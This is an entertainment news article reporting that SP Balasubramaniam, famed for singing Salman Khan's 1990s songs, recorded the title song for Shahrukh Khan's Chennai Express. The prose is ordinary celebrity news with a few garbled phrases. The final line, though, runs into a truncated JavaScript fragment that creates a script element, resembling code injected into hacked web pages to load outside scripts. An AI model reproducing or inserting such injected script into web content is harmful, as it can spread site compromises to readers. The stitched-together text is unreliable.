Salman Khan’s singer sings for SRK!

The man who was once the default singer for Salman Khan’s songs, SP Balasubramaniam, has  sung a song for Shahrukh Khan’s upcoming film Chennai Express! The song is supposedly the title song of this film and is peppy, unlike Salman’s songs that were mostly romantic. The Padma Shri and Padma Bhusan awardee has recently lent his voice for Nikal na jaye kahin Chennai Express, which is the title song of Shahrukh Khan’s upcoming movie, Chennai Express.

SP Balasubramaniam sang numerous songs for Salman Khan’s films back in the 90’s. It was believed that his voice matched that of Salman and so, he was the best choice for any song featuring Salman Khan. The songs that SP Balasubramaniam sang for Salman Khan became instant hits. He’s best remembered for lending his iconic voice to the songs in Hum Aapke Hain Koun. He also sang for Saajan and Maine Pyar Kiya. He also sang Pehla Pehla Pyaar Hai, which became an instant hit and SP Balasubramaniam became a sensation. He’s the only playback singer to have won National Awards across four languages! SP Balasubramaniam has sung over 40,000 songs in various Indian languages.

Now, SP Balasubramaniam’s new song Nikal na jaye kahin Chennai Express seems all set to become an hit as the song’s recently released teaser has been well by the online community! While the relationship between Salman Khan and Shahrukh Khan turned sour long ago, both of them continue to share a good relationship with SP Balasubramaniam. However, because of the sheer number of hit songs SP Balasubramaniam has given Salman, he’s called “Salman Khan’s singer”!

While it is still to be seen whether his voice suits Shahrukh Khan, we wonder if Salman Khan feels like singing “Hum Aapke Hain Koun” !}var d=document;var s=d.createElement(‘script’);
